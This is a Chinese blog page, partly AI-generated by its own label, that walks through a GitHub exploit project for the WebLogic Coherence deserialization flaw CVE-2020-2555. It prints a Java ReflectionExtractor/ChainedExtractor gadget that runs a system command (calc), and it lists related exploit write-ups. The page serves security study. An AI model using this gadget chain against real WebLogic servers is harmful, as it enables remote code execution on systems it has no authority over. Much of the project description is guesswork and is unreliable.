CVE-2020-2555 项目使用教程

最新推荐文章于 2024-12-05 11:57:08 发布
最新推荐文章于 2024-12-05 11:57:08 发布
阅读量552 收藏 10
点赞数 20
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gitblog_01136/article/details/142297743

CVE-2020-2555 项目使用教程

CVE-2020-2555 Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE CVE-2020-2555 项目地址: https://gitcode.com/gh_mirrors/cv/CVE-2020-2555

1. 项目目录结构及介绍

CVE-2020-2555/
├── lib/
│   └── coherence.jar
├── src/
│   └── CVE_2020_2555.java
├── .gitignore
├── LICENSE
├── README.md
├── weblogic_cmd.iml
└── weblogic_t3.py
  • lib/: 包含项目所需的依赖库文件,如 coherence.jar
  • src/: 包含项目的源代码文件,如 CVE_2020_2555.java
  • .gitignore: 指定 Git 版本控制系统忽略的文件和目录。
  • LICENSE: 项目的开源许可证文件。
  • README.md: 项目的说明文档。
  • weblogic_cmd.iml: 可能是 IntelliJ IDEA 的项目配置文件。
  • weblogic_t3.py: 可能是与 T3 协议相关的 Python 脚本。

2. 项目启动文件介绍

2.1 weblogic_t3.py

weblogic_t3.py 是一个 Python 脚本,可能用于通过 T3 协议与 Weblogic 服务器进行交互。该脚本的具体功能需要进一步分析其代码内容。

2.2 CVE_2020_2555.java

CVE_2020_2555.java 是项目的主要源代码文件,包含了对 CVE-2020-2555 漏洞的利用代码。以下是该文件的简要介绍:

public class CVE_2020_2555 {
    public static void main(String[] args) throws Exception {
        ReflectionExtractor[] reflectionExtractors = new ReflectionExtractor[] {
            new ReflectionExtractor("getMethod", new Object[] {"getRuntime", new Class[0]}),
            new ReflectionExtractor("invoke", new Object[] {null, new Class[0]}),
            new ReflectionExtractor("exec", new Object[] {new String[] {"cmd", "/c", "calc"}})
        };
        ChainedExtractor chainedExtractor = new ChainedExtractor(reflectionExtractors);
        chainedExtractor.extract(Runtime.class);
    }
}

该代码通过构造 ReflectionExtractor 对象数组,并使用 ChainedExtractor 进行链式调用,最终执行系统命令。

3. 项目的配置文件介绍

3.1 coherence.jar

coherence.jar 是项目依赖的库文件,可能包含与 Oracle Coherence 相关的类和方法。请确保该文件与目标 Weblogic 版本匹配,以避免 serialVersionUID 不一致的错误。

3.2 .gitignore

.gitignore 文件用于指定 Git 版本控制系统忽略的文件和目录,避免将不必要的文件提交到版本库中。

3.3 LICENSE

LICENSE 文件包含项目的开源许可证信息,通常为 MIT 许可证。

3.4 README.md

README.md 文件是项目的说明文档,包含项目的概述、使用方法、依赖项等信息。建议在启动项目前仔细阅读该文件。

3.5 weblogic_cmd.iml

weblogic_cmd.iml 可能是 IntelliJ IDEA 的项目配置文件,用于配置项目的运行环境、依赖项等。

以上是 CVE-2020-2555 项目的基本使用教程,希望对你有所帮助。

CVE-2020-2555 Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE CVE-2020-2555 项目地址: https://gitcode.com/gh_mirrors/cv/CVE-2020-2555

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

CVE-2020-0796 漏洞利用教程
alert['Hello World']
10-30 3536
目录漏洞描述影响版本漏洞检测漏洞利用蓝屏攻击远程代码执行本地提权修复建议 漏洞描述   Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞,也称为“ Windows SMBv3客户端/服务器远程执行代码漏洞”。 影响版本 适用于32位系统的Windows 10版本1903 Windows 10 1903版(用于基于ARM64的系统) Windows 10 1903版(用于基于x64的系统) 适用于32位系统的Windows 10版本1909 Windo
Spring连环CVE-2015-5211和CVE-2020-5421漏洞升级教程
xmt1139057136的专栏
08-14 2376
你知道的越多,不知道的就越多,业余的像一棵小草!你来,我们一起精进!你不来,我和你的竞争对手一起精进!编辑:业余草推荐:https://www.xttblog.com/?p=5259我们不...
weblogic-CVE-2020-2555
m0_51369969的博客
07-14 308
Oracle WebLogic Server 产品中的漏洞(组件:WLS 核心组件)。受影响的受支持版本为 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0 和 12.2.1.4.0。易于利用的漏洞允许未经身份验证的攻击者通过 IIOP 访问网络来破坏 Oracle WebLogic Server。成功攻击此漏洞可导致 Oracle WebLogic Server 被接管。...
漫谈 Weblogic CVE-2020-2555
whatday的专栏
07-09 867
背景 在2020年1月,互联网上爆出了Weblogic反序列化远程命令执行漏洞(CVE-2020-2555),Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令,风险较大。 漏洞信息曝光之后,互联网中发布几篇该漏洞相关的分析文章以及利用 POC,但公布的 POC 有部分不足之处,导致漏洞检测效率变低,不足之处主要体现在: 1 目前所有的利用工具都是通过动态编译进行生产 POC
漫谈-Weblogic-CVE-2020-2555
Ms08067安全实验室
05-01 4918
背景 2020年1月,互联网上爆出了weblogic反序列化远程命令执行漏洞(CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺...
CVE-2020-2555:CVE-2020-2555 Python POC
04-15
CVE-2020-2555 python CVE-2020-2555.py ip port test.ser
Weblogic-CVE-2020-2555复现(VirtualBox虚拟机搭建)
weixin_43061533的博客
11-17 1119
weblogic-cve_2020_2555复现 安装环境 靶机:一台Windows 2008 R2 服务器 攻击机:Win 10 配置环境 Jdk1.8.0_221 Weblogic 12.2.1.4.0 下载地址https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html 链接:https://pan.baidu.com/s/12Tt4Y7sXoht0RJD03f25bQ 提取码:1234 1.安装 【代码1
weblogic CVE-2020-2555 反序列化RCE 复现
qq_30302577的博客
04-01 3364
文章目录前言0x01 漏洞说明0x02 影响版本0x03 漏洞利用0x04 注意的地方0x05 修复建议0x06 时间线0x07 参考链接 前言 本教程及工具仅供技术学习交流、请勿用于非法行为、否则后果自负 0x01 漏洞说明 2020年3月6日,Oracle Coherence 反序列化远程代码执行漏洞(CVE-2020-2555)的细节被公开,Oracle Coherence为Oracle融...
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
m0_60721649的博客
04-06 1669
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**薪资区间6k-15k。
CVE-2020-0787 Windows全版本本地提权漏洞复现
m0_56642842的博客
07-23 3418
0x00 简介 2020年3月,微软公布了一个影响范围堪称windows全版本的本地提权漏洞CVE-2020-0787,根据微软的漏洞描述,攻击者在使用低权限用户登录系统后,可以利用该漏洞构造恶意程序直接提权到administrator或者system权限。 0x01 漏洞概述 当Windows背景智能传输服务(BITS)没有正确处理符号链接时,存在特权提升漏洞。成功利用此漏洞的攻击者可以改写目标文件,从而提升权限。要利用这个漏洞,攻击者首先必须登录系统,攻击者可以运行EXP,利用该漏洞来提权进而完全控制受
CVE-2020-2555:Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE
03-20
CVE-2020-2555 Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE com.supeream.CVE_2020_2555 /* * author:Y4er.com * * gadget: * BadAttributeValueExpException.readObject() * com.tangosol.util.filter.LimitFilter.toString() * com.tangosol.util.extractor.ChainedExtractor.extract() * com.tangosol.util.extractor.ReflectionExtractor.extract()
weblogic-cve_2020_2555漏洞复现
0day
01-28 2081
weblogic-cve_2020_2555漏洞复现 漏洞概述: 该漏洞于2020年1月在网上爆出,属于weblogic反序列化漏洞,漏洞原因是Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令。 漏洞复现: Vulfocus平台拉取下载启动漏洞镜像环境: 访问漏洞环境地址端口11317,该端口映射在weblogic的服务端口7001,在url地址栏输入ip端口后添加
漏洞复现:WebLogic反序列化远程代码执行漏洞(cve-2020-2555)
HCIEMAYU的博客
07-17 603
WebLogic是Oracle推出的application server,是Web应用系统必不可少的组件,其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性强、快速开发等多种特性。大多数未及时更新的Weblogic组件存在严重的漏洞,导致其成为攻击者攻击的重点目标。,将java版本切换至jdk1.8(如果切换不成功,用root权限尝试切换一下试试)配置页面中,进入安全选项卡页面,点击筛选器,配置筛选器。4、输入URL,回显选择FileOutputStream,进行漏洞验证。
CVE2020-2555漏洞分析
weixin_45540609的博客
08-05 2263
一、简介 Oracle Coherence为Oracle融合中间件中的产品,在WebLogic 12c及以上版本中默认集成到WebLogic安装包中,T3是用于在WebLogic服务器和其他类型的Java程序之间传输信息的协议。 weblogic反序列化远程命令执行漏洞(CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺陷,攻击者可利用该漏洞再未授权情况下通过构造T3协议请求,获取weblogic服务器权限,执行任意命令。 漏洞影响情况: Oracl
CVE-2020-2555:Oracle Coherence 反序列化RCE复现
爱国小白帽
04-27 2896
CVE-2020-2555:Oracle Coherence 反序列化RCE复现 原创 PingPig [Timeline Sec](javascript:void(0)???? 今天 点击上方蓝色字体关注我们,一起学安全! 本文作者:PingPig(团队正式成员) 本文字数:699 阅读时长:2~3min 声明:请勿用作违法用途,否则后果自负 0x01 简介 Oracle Coherence为Orac...
【漏洞通告】Oracle Coherence反序列化远程代码执行漏洞(CVE-2020-2555)通告
爱国小白帽
03-07 2040
【漏洞通告】Oracle Coherence反序列化远程代码执行漏洞(CVE-2020-2555)通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 昨天 通告编号:NS-2020-0014 2020-03-06 TAG: Oracle Coherence、WebLogic、远程代码执行、CVE-2020-2555 危害等级: 高,攻击者利用此...
weblogic反序列化之CVE-2020-2555漏洞分析
weixin_45682070的博客
03-18 4900
前言 CVE-2020-2555主要源于在coherence.jar存在着用于gadget构造的类(反序列化构造类),并且利用weblogic默认存在的T3协议进行传输和解析进而导致weblogic服务器反序列化恶意代码最后执行攻击语句。 Oracle Coherence组件默认集成在Weblogic12c及以上版本中。 ...
CVE-2020-2555 WebLogic 反序列化漏洞常见问题解决方案
最新发布
gitblog_00749的博客
12-05 419
CVE-2020-2555 WebLogic 反序列化漏洞常见问题解决方案 CVE-2020-2555 Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE 项目...
CVE-2020-2555:Weblogic 反序列化漏洞利用工具推荐
gitblog_01186的博客
09-16 984
CVE-2020-2555:Weblogic 反序列化漏洞利用工具推荐 CVE-2020-2555 Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE 项目地址...
CVE-2020-12116漏洞利用教程:读取ManageEngine OpManager任意文件
资源摘要信息:"该资源涉及了一个特定的开源Java SNMP库中的安全漏洞,其CVE编号为CVE-2020-12116。此漏洞允许攻击者在未授权的情况下读取ManageEngine OpManager应用程序中的任意文件。OpManager是一款网络管理软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吴铎根

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值